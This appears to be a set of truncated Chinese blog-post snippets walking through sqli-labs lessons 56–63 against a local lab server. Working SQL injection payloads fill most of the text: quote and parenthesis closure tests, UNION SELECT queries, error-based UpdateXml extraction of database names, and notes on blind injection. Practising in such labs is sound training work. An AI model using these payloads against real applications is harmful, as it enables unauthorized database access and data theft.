整型的注入 http://192.168.136.128/sqli-labs-master/Less-59/?id=1 or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…
http://192.168.136.128/sqli-labs-master/Less-61/?id=1' 单引号双括号闭合 192.168.136.128/sqli-labs-master/Less-61/?id=1')) or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…
http://192.168.136.128/sqli-labs-master/Less-60/?id=1")%23 http://192.168.136.128/sqli-labs-master/Less-60/?id=0") or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…
单引号闭合成功,但是union select结果不对 http://192.168.136.128/sqli-labs-master/Less-58/?id=0' union select 1,2,3%23 id='0'是不出结果的,那数据就不是从数据库取出的 http://192.168.136.128/sqli-labs-master/Less-58/?id=1' 但是有MYSQL的报错 那就用报错取数据 http://192.168.136.128/sqli-labs-master/Les…
引号闭合 http://192.168.136.128/sqli-labs-master/Less-63/?id=1' or '1'='1 剩下的和Less62一样…
允许130次尝试,然后是个盲注漏洞,看来要单字符猜解了 加单引号,页面异常,但报错被屏蔽了 http://192.168.136.128/sqli-labs-master/Less-62/?id=1' 加注释符,说明不止是用单引号闭合 http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23 加单括号,页面恢复正常 http://192.168.136.128/sqli-labs-master/Less-62/?id=1')%23 猜解数…
双引号闭合 http://192.168.136.128/sqli-labs-master/Less-57/?id=1"%23 和less56一样查数据…
单引号括号闭合 http://192.168.136.128/sqli-labs-master/Less-56/?id=1')%23 http://192.168.136.128/sqli-labs-master/Less-56/?id=0') union select 1,2,database()%23 http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,group_concat(tab…